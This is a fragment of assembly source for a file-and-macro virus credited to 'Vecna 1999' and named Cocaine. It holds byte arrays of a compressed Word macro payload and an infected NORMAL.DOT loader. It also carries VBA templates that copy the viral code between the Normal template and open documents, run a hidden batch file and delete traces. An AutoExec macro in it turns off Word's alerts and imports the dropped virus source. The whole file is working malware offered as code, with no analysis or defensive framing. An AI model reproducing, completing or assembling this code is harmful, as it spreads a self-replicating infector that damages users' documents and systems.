; DB 'PRINT #1,"COPY C:\W32COKE.EX C:\W32COKE.EXE >NUL"', CRLF
; DB 'PRINT #1,"C:\W32COKE.EXE"', CRLF
; DB 'PRINT #1,"DEL C:\W32COKE.EX >NUL"', CRLF
; DB 'PRINT #1,"DEL C:\COCAINE.SRC >NUL"', CRLF
; DB 'PRINT #1,"DEL C:\COCAINE.SYS >NUL"', CRLF
; DB 'PRINT #1,"DEL C:\W32COKE.EXE >NUL"', CRLF
; DB 'PRINT #1,"DEL C:\%7.BAT >NUL"', CRLF
; DB 'CLOSE #1', CRLF
; DB 0
;
; DB 4
; DB "SET %5 = NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS(%2).CODEMODULE", CRLF
; DB 0
;
; DB 4
; DB "SET %6 = ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS(%3).CODEMODULE", CRLF
; DB 0
;
; DB 5
; DB 'IF %5.LINES(1, 1) <> "''%1" THEN', CRLF
; DB "%5.DELETELINES 1, %5.COUNTOFLINES", CRLF
; DB "%5.INSERTLINES 1, %6.LINES(1, %6.COUNTOFLINES)", CRLF
; DB "END IF", CRLF
; DB 0
;
; DB 5
; DB 'IF %6.LINES(1, 1) <> "''%1" THEN', CRLF
; DB "%6.DELETELINES 1, %6.COUNTOFLINES", CRLF
; DB "%6.INSERTLINES 1, %5.LINES(1, %5.COUNTOFLINES)", CRLF
; DB "END IF", CRLF
; DB 0
;
; DB 6
;;CREATE DEBUG SCRIPT
; DB 0
;
; DB 7
; DB 'OPEN "C:\ANCEV.SYS" FOR OUTPUT AS 1', CRLF
; DB 'PRINT #1,""', CRLF
; DB "CLOSE #1", CRLF
; DB 0
;
; DB 7
; DB "SHELL %7.BAT, VBHIDE", CRLF
; DB "FOR %4=1 TO 100", CRLF
; DB "NEXT %4", CRLF
; DB "KILL %7.BAT", CRLF
; DB 0
;
; DB 8
; DB "END SUB", CRLF
; DB 0
;
; END
macro_sized dd 0
macro_size EQU 750 ; size in bytes
macros DB 000H,000H,000H,000H,000H,000H,001H,027H,025H,031H,00DH,00AH,053H,055H
DB 042H,020H,041H,055H,054H,04FH,043H,04CH,000H,000H,04FH,053H,045H,028H,029H
DB 00DH,00AH,04FH,04EH,020H,045H,052H,052H,04FH,052H,020H,000H,000H,052H,045H
DB 053H,055H,04DH,045H,020H,04EH,045H,058H,054H,00DH,00AH,000H,002H,04FH,000H
DB 000H,050H,054H,049H,04FH,04EH,053H,02EH,056H,049H,052H,055H,053H,050H,052H
DB 04FH,054H,004H,008H,045H,043H,003H,011H,020H,03DH,020H,046H,041H,04CH,053H
DB 045H,00BH,023H,043H,04FH,04EH,046H,008H,007H,049H,052H,04DH,002H,007H,056H
DB 045H,052H,053H,003H,036H,00FH,026H,003H,049H,053H,041H,056H,045H,04EH,020H
DB 002H,04FH,052H,04DH,041H,04CH,002H,04EH,04DH,050H,054H,00BH,024H,041H,050H
DB 050H,04CH,049H,043H,002H,000H,041H,003H,061H,02EH,044H,049H,053H,050H,04CH
DB 041H,059H,041H,04CH,045H,052H,054H,053H,089H,000H,002H,025H,057H,044H,005H
DB 00BH,04EH,04FH,04EH,004H,076H,053H,048H,04FH,057H,056H,049H,053H,055H,000H
DB 018H,041H,04CH,042H,041H,053H,049H,043H,045H,044H,049H,054H,002H,0BEH,00AH
DB 097H,025H,032H,03DH,021H,009H,002H,0E9H,000H,002H,025H,033H,004H,008H,003H
DB 046H,002H,01FH,025H,034H,002H,04AH,031H,020H,054H,04FH,022H,068H,020H,005H
DB 083H,054H,045H,04DH,002H,065H,054H,045H,02EH,056H,042H,002H,08EH,04AH,002H
DB 0DCH,002H,00AH,043H,008H,090H,04FH,04DH,050H,002H,065H,04EH,054H,053H,02EH
DB 043H,04FH,055H,04EH,012H,007H,049H,046H,00FH,030H,043H,000H,00FH,030H,005H
DB 030H,028H,025H,034H,029H,002H,034H,044H,045H,04DH,04FH,044H,055H,04CH,045H
DB 02EH,000H,014H,04CH,049H,04EH,045H,053H,028H,031H,02CH,031H,029H,002H,077H
DB 022H,012H,079H,022H,020H,054H,010H,0AAH,048H,045H,04EH,020H,002H,09BH,025H
DB 034H,00DH,00AH,013H,064H,020H,003H,009H,000H,00EH,09DH,041H,012H,064H,020H
DB 0BBH,056H,045H,044H,04FH,043H,012H,08AH,04EH,054H,002H,093H,00FH,09DH,045H
DB 00DH,09DH,00FH,030H,00FH,0CDH,04EH,003H,030H,0CBH,004H,00FH,09DH,00FH,09DH
DB 031H,007H,09DH,033H,03DH,003H,094H,00AH,09DH,04FH,050H,002H,0B4H,022H,043H
DB 03AH,05CH,025H,080H,000H,037H,02EH,042H,041H,054H,022H,020H,013H,04BH,04FH
DB 055H,054H,050H,055H,054H,020H,041H,004H,000H,053H,020H,012H,066H,050H,052H
DB 049H,04EH,054H,020H,023H,031H,02CH,022H,040H,045H,043H,000H,002H,048H,04FH
DB 020H,04FH,046H,046H,022H,00DH,00AH,009H,016H,044H,045H,042H,055H,047H,020H
DB 042H,000H,03CH,002H,043H,043H,04FH,043H,041H,012H,016H,02EH,053H,052H,043H
DB 020H,03EH,04EH,055H,04CH,041H,000H,00CH,027H,043H,04FH,050H,059H,020H,002H
DB 025H,057H,033H,032H,043H,04FH,04BH,045H,02EH,045H,06AH,031H,058H,00DH,00EH
DB 045H,00FH,033H,02CH,003H,096H,009H,02EH,045H,00CH,04EH,044H,045H,04CH,00DH
DB 03FH,00FH,03EH,02CH,022H,09FH,0FFH,006H,023H,00FH,095H,00FH,047H,003H,047H
DB 008H,024H,059H,053H,00FH,048H,008H,048H,00AH,08AH,00FH,024H,008H,024H,015H
DB 044H,007H,01FH,034H,080H,012H,039H,001H,06FH,032H,048H,004H,053H,045H,054H
DB 020H,025H,035H,022H,02AH,02FH,09CH,01FH,0CFH,016H,0CFH,032H,02BH,06CH,008H
DB 041H,036H,0AFH,014H,002H,041H,02FH,010H,00FH,041H,006H,041H,033H,00EH,041H
DB 005H,022H,0E8H,025H,035H,028H,0B6H,020H,022H,0B7H,03CH,03EH,020H,019H,071H
DB 029H,0B8H,00DH,00AH,002H,01EH,012H,033H,045H,054H,045H,024H,03DH,020H,031H
DB 02CH,002H,0B1H,022H,0F1H,032H,025H,04FH,0C6H,065H,046H,004H,013H,004H,023H
DB 049H,04EH,053H,032H,0B5H,004H,010H,004H,023H,036H,009H,053H,025H,036H,00CH
DB 02FH,042H,079H,045H,0E0H,0F3H,04EH,044H,020H,049H,046H,002H,0BFH,004H,07EH
DB 00AH,02BH,00FH,07EH,002H,05BH,036H,02EH,00FH,07EH,00DH,04FH,004H,023H,00FH
DB 07EH,033H,002H,00AH,0D1H,002H,0BFH,043H,04FH,009H,0ADH,00BH,07EH,006H,000H
DB 007H,028H,0E7H,041H,04EH,043H,045H,056H,02EH,078H,040H,053H,059H,053H,02FH
DB 0EAH,02CH,0EAH,022H,025H,01AH,0BEH,007H,053H,048H,045H,04CH,04CH,020H,015H
DB 0DEH,02CH,0C0H,088H,020H,056H,042H,048H,049H,044H,042H,0A8H,033H,02AH,025H
DB 034H,03DH,044H,073H,031H,030H,030H,03AH,0F4H,004H,000H,04BH,049H,008H,02FH
DB 00DH,00AH,000H,008H,045H,04EH,044H,020H,053H,055H,042H,00DH,00AH,000H,000H
DB 000H
;---------------------------------(MACRO.INC)---------------------------------
;----------------------------------(NDOT.INC)---------------------------------
;Macro poly data
;(c) Vecna 1999
;This is the binary image of the LZ compressed NORMAL.DOT loader. The loader
;is, basically, a WinWord8 template with the code below. Its function is load
;the 2nd part of the macro virus code, polymorphic, from the disk. The routine
;that drop the image should be changed to make it _patch_ the ' COCAINE string
;and making the virus stop reinfecting, copying the first line of the virus
;dropped source to there... bahh, nevermind... :-)
;Sub AutoExec()
;On Error Goto erro
;Application.DisplayAlerts = False
;Application.EnableCancelKey = wdDisabled
;For i = 1 To NormalTemplate.VBProject.VBComponents.Count
;If NormalTemplate.VBProject.VBComponents(i).CodeModule.Lines(1,1) = "'Cocaine" Then GoTo erro
;Next i
;NormalTemplate.VBProject.VBComponents.Import("c:\cocaine.sys")
;NormalTemplate.Save
;erro:
;End Sub
normaldot_size EQU 8292 ; size in bytes
normaldot_sized dd 0
normaldot DB 000H,000H,000H,000H,000H,002H,0D0H,0CFH,011H,0E0H,0A1H,0B1H,01AH,0E1H
DB 000H,00EH,001H,03EH,000H,003H,000H,0FEH,0FFH,0A8H,061H,009H,000H,006H,00AH
DB 018H,001H,002H,00CH,021H,002H,004H,004H,003H,010H,000H,000H,023H,002H,009H
DB 003H,014H,0FEH,0C8H,0FFH,0FFH,0FFH,0FFH,002H,00BH,000H,020H,002H,005H,002H
DB 00BH,00FH,003H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,007H,000H,00FH,010H,00FH,010H,00CH,010H,0ECH
DB 0A5H,0C1H,000H,049H,000H,016H,004H,000H,000H,001H,012H,0BFH,03FH,000H,012H
DB 0C0H,002H,003H,012H,0DAH,002H,006H,003H,012H,002H,004H,00EH,000H,062H,06AH
DB 062H,06AH,0B2H,0B3H,0B2H,0B3H,003H,0E0H,002H,014H,00EH,003H,016H,004H,016H
DB 000H,01EH,00CH,000H,000H,0D0H,0D9H,001H,004H,004H,023H,00CH,00EH,023H,0F1H
DB 0CAH,00CH,00FH,0FFH,0FFH,00FH,008H,010H,00FH,00CH,008H,019H,006H,009H,05DH
DB 004H,008H,08CH,004H,006H,000H,000H,003H,008H,003H,004H,0B7H,067H,003H,00FH
DB 00FH,008H,00BH,010H,014H,003H,021H,006H,004H,0BCH,00FH,008H,00FH,010H,002H
DB 010H,002H,0BDH,000H,0C8H,006H,008H,007H,030H,018H,0D0H,0AFH,002H,000H,000H
DB 0B6H,002H,014H,0E0H,002H,004H,003H,003H,00FH,008H,00FH,010H,00FH,010H,007H
DB 010H,018H,012H,00FH,0C7H,002H,041H,076H,055H,0DFH,002H,008H,002H,007H,000H
DB 00FH,008H,00FH,010H,003H,010H,024H,002H,029H,0CEH,002H,080H,0F4H,002H,034H
DB 0C2H,012H,07EH,03EH,0F5H,0FFH,002H,010H,003H,002H,010H,015H,002H,008H,00FH
DB 003H,007H,0F8H,007H,070H,00FH,020H,007H,018H,00FH,008H,007H,010H,003H,058H
DB 003H,034H,007H,010H,007H,050H,0FFH,05FH,007H,008H,007H,018H,003H,024H,003H
DB 004H,007H,010H,00FH,008H,00FH,010H,007H,010H,00FH,048H,00FH,010H,013H,020H
DB 003H,058H,00FH,004H,0A0H,002H,011H,00EH,0FDH,0FBH,002H,004H,0AEH,002H,004H
DB 003H,008H,007H,038H,00FH,008H,007H,010H,007H,070H,007H,050H,003H,010H,038H
DB 002H,03CH,003H,008H,002H,007H,008H,003H,007H,020H,0FFH,006H,007H,038H,007H
DB 008H,008H,021H,00FH,009H,00FH,010H,00EH,010H,007H,050H,007H,068H,0D4H,002H
DB 020H,023H,050H,0A0H,010H,0DAH,09BH,0B8H,0F8H,0FFH,065H,0BEH,001H,027H,050H
DB 007H,008H,007H,028H,007H,038H,002H,02FH,00FH,003H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FDH,0FFH,002H,010H,00DH,002H
DB 004H,00FH,003H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,0EFH,0FFH,00FH,010H,00FH,010H,00CH,010H,042H,066H,001H,002H,004H,00CH
DB 014H,00FH,00DH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,03FH,0FBH,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,009H,010H,001H,000H,012H,0FCH,023H,000H,0FDH,009H
DB 014H,00FH,00AH,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0EFH
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,007H,010H,082H,064H,000H,028H,000H,007H,015H,00FH
DB 008H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,0FFH,03FH,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,012H,000H,0E8H,041H,00FH,000H,00AH,062H,007H
DB 05BH,002H,008H,0E2H,069H,004H,01FH,0E2H,086H,040H,0F1H,0FFH,002H,000H,002H
DB 008H,000H,000H,060H,006H,000H,04EH,000H,06FH,000H,072H,000H,06DH,000H,061H
DB 000H,06CH,002H,01EH,003H,024H,004H,070H,000H,000H,06DH,048H,016H,082H,038H
DB 002H,00FH,00CH,003H,036H,000H,041H,040H,0F2H,0FFH,0A1H,000H,036H,011H,040H
DB 002H,016H,013H,000H,046H,002H,038H,06EH,000H,074H,000H,065H,000H,020H,000H
DB 070H,002H,03EH,072H,040H,03DH,000H,0E1H,000H,067H,000H,02EH,006H,00EH,064H
DB 002H,054H,0E3H,002H,022H,002H,02BH,00CH,003H,063H,095H,002H,000H,062H,078H
DB 000H,0D2H,049H,001H,000H,0FFH,002H,001H,003H,010H,004H,020H,0FFH,0FFH,003H
DB 008H,005H,029H,009H,00AH,087H,0BCH,003H,0AFH,082H,003H,019H,002H,090H,083H
DB 0C8H,002H,007H,000H,007H,018H,005H,002H,018H,0FFH,002H,0C8H,000H,000H,005H
DB 000H,056H,002H,088H,008H,000H,063H,000H,06EH,002H,088H,012H,000H,043H,000H
DB 03AH,000H,05CH,000H,04CH,000H,049H,000H,028H,02AH,058H,000H,04FH,002H,00AH
DB 06CH,002H,088H,061H,000H,064H,002H,022H,072H,002H,0A0H,064H,002H,00EH,074H
DB 000H,0D4H,005H,0FFH,001H,003H,068H,056H,002H,042H,000H,002H,088H,004H,007H
DB 00AH,005H,010H,003H,091H,002H,000H,025H,000H,054H,0B5H,0A8H,002H,035H,06DH
DB 002H,0DFH,06CH,002H,059H,003H,0EBH,050H,002H,0D7H,06FH,000H,06AH,002H,016H
DB 063H,002H,0FBH,02EH,002H,020H,080H,060H,068H,000H,069H,000H,073H,000H,044H
DB 002H,055H,063H,000H,075H,000H,06DH,002H,01AH,013H,015H,02EH,014H,035H,000H
DB 041H,002H,00EH,074H,002H,016H,045H,000H,078H,002H,014H,063H,012H,083H,011H
DB 003H,072H,003H,053H,045H,000H,0A8H,0A2H,04DH,000H,050H,002H,0A0H,041H,002H
DB 03FH,045H,002H,00AH,052H,002H,0A6H,04AH,000H,045H,002H,0B8H,054H,002H,0A0H
DB 0A8H,01AH,054H,000H,048H,002H,0BAH,053H,002H,053H,04FH,002H,012H,055H,002H
DB 02CH,045H,012H,0A4H,003H,01AH,041H,000H,055H,055H,01CH,002H,032H,04FH,002H
DB 02AH,058H,002H,004H,043H,002H,0B0H,040H,000H,080H,003H,055H,002H,00AH,002H
DB 003H,0E8H,020H,082H,04FH,001H,002H,066H,009H,010H,002H,013H,004H,003H,002H
DB 010H,004H,007H,000H,002H,01DH,000H,000H,020H,000H,000H,008H,000H,010H,001H
DB 040H,000H,000H,003H,002H,014H,047H,016H,090H,002H,02EH,002H,002H,006H,003H
DB 005H,004H,005H,0F8H,056H,002H,003H,004H,003H,014H,002H,017H,008H,003H,002H
DB 01DH,004H,00CH,054H,002H,0E3H,003H,0D9H,073H,002H,03EH,04EH,002H,0CDH,077H
DB 02DH,000H,002H,008H,052H,002H,0DBH,023H,034H,06EH,002H,022H,035H,010H,090H
DB 001H,002H,000H,005H,005H,001H,002H,0C0H,08BH,001H,007H,006H,002H,005H,007H
DB 002H,013H,003H,003H,007H,077H,003H,00CH,080H,003H,005H,053H,000H,079H,012H
DB 021H,026H,0BCH,062H,002H,03AH,023H,06AH,033H,022H,004H,07EH,00BH,006H,004H
DB 002H,003H,001H,00FH,07EH,004H,0AEH,003H,036H,041H,012H,073H,016H,000H,069H
DB 012H,07FH,003H,034H,022H,012H,0FBH,030H,008H,088H,018H,000H,000H,0C4H,002H
DB 000H,000H,0A9H,0C1H,05CH,004H,0A1H,078H,01CH,033H,066H,07AH,002H,004H,003H
DB 02CH,001H,000H,002H,017H,003H,009H,004H,004H,001H,004H,044H,004H,0F8H,0FDH
DB 000H,003H,010H,004H,029H,004H,014H,013H,006H,003H,00EH,003H,004H,003H,011H
DB 024H,00FH,0F5H,003H,015H,00FH,004H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,03FH,0F8H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,006H,010H,013H
DB 0CCH,058H,001H,0FFH,0FFH,012H,006H,010H,007H,007H,03BH,0EEH,00BH,00CH,007H
DB 020H,0FFH,0FFH,00FH,008H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,0FDH,0FFH,00BH,010H,0FFH,00FH,001H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0F3H
DB 000H,00FH,010H,00EH,010H,0FEH,0FFH,0F3H,02FH,0B3H,04AH,0ABH,016H,0D3H,006H
DB 000H,000H,0E0H,085H,09FH,0F2H,0F9H,04FH,000H,0E8H,068H,010H,0ABH,091H,008H
DB 000H,02BH,027H,0B3H,0D9H,030H,002H,023H,050H,0D2H,019H,0D3H,0B9H,002H,007H
DB 06CH,055H,000H,088H,002H,010H,003H,03AH,090H,002H,008H,0D3H,027H,09CH,002H
DB 008H,004H,002H,004H,0A8H,002H,004H,005H,002H,004H,0B8H,0ABH,05AH,002H,004H
DB 0D3H,0EDH,0C4H,002H,008H,008H,002H,004H,0D4H,002H,004H,009H,002H,004H,0E4H
DB 002H,004H,0B3H,0B4H,0F0H,002H,008H,00AH,04DH,055H,002H,004H,00CH,002H,04DH
DB 0F2H,0F1H,000H,018H,002H,008H,00DH,002H,010H,024H,002H,008H,00EH,002H,008H
DB 030H,002H,008H,00FH,0ADH,0D6H,002H,008H,038H,002H,008H,003H,074H,040H,002H
DB 008H,013H,002H,010H,048H,002H,008H,003H,078H,0E4H,002H,06DH,01EH,002H,010H
DB 002H,00FH,029H,0E0H,002H,006H,073H,000H,00FH,00CH,006H,002H,016H,056H,065H
DB 063H,06EH,061H,000H,066H,009H,01CH,002H,010H,003H,028H,0C1H,00DH,003H,098H
DB 04EH,06FH,072H,06DH,061H,0E2H,037H,003H,010H,009H,02CH,000H,004H,02CH,003H
DB 060H,031H,000H,063H,06EH,003H,000H,003H,01CH,003H,074H,04DH,069H,063H,072H
DB 06FH,073H,06FH,066H,074H,020H,057H,06FH,072H,064H,018H,014H,020H,038H,02EH
DB 012H,00DH,0F2H,027H,000H,000H,08CH,086H,047H,002H,067H,000H,004H,00CH,0B0H
DB 0E8H,03DH,010H,0FFH,0B8H,065H,0BEH,001H,004H,00CH,03CH,06FH,085H,003H,00CH
DB 013H,018H,003H,0A0H,003H,008H,003H,028H,00FH,008H,01EH,08FH,00FH,00FH,0FFH
DB 0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,03FH,0E0H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FEH,0FFH,000H,000H,004H
DB 000H,0E3H,0EEH,0E3H,09EH,009H,004H,001H,000H,003H,012H,002H,0D5H,0CDH,0D5H
DB 09CH,02EH,01BH,010H,093H,097H,008H,000H,02BH,02CH,0F9H,054H,067H,0AEH,044H
DB 002H,01FH,005H,00EH,014H,02CH,0E2H,0DDH,0E8H,002H,018H,0F3H,0C0H,002H,00BH
DB 000H,068H,002H,00CH,0F3H,0B4H,070H,0B5H,0AAH,002H,008H,005H,002H,004H,07CH
DB 002H,004H,0F3H,05CH,084H,002H,008H,011H,002H,004H,08CH,002H,004H,017H,002H
DB 004H,094H,002H,004H,0DAH,0AAH,00BH,002H,004H,09CH,002H,004H,0F3H,0DCH,0A4H
DB 002H,008H,0F3H,068H,0ACH,002H,008H,016H,002H,004H,0B4H,002H,004H,00DH,002H
DB 004H,076H,0E1H,0BCH,002H,004H,003H,05CH,0C9H,002H,008H,003H,094H,0F7H,0F4H
DB 004H,002H,010H,032H,039H,041H,000H,0F3H,050H,003H,078H,00BH,008H,0C3H,03BH
DB 002H,01BH,004H,018H,0B3H,00DH,008H,000H,003H,064H,003H,010H,00FH,008H,007H
DB 010H,01EH,002H,07DH,003H,040H,003H,004H,000H,00CH,017H,0D8H,002H,00DH,003H
DB 065H,0F3H,0F5H,007H,002H,036H,054H,0EDH,074H,075H,06CH,06FH,004H,04CH,003H
DB 020H,098H,002H,013H,003H,068H,059H,05DH,002H,007H,000H,020H,002H,005H,003H
DB 014H,036H,002H,008H,002H,002H,004H,03EH,002H,004H,003H,010H,003H,00CH,00AH
DB 002H,00CH,05FH,000H,02BH,050H,049H,044H,05FH,047H,055H,049H,044H,014H,05CH
DB 003H,0B6H,041H,002H,016H,04EH,002H,004H,07BH,000H,0FAH,0FDH,030H,00EH,002H
DB 02DH,008H,010H,00FH,00AH,003H,02AH,009H,014H,003H,00EH,00BH,004H,07DH,002H
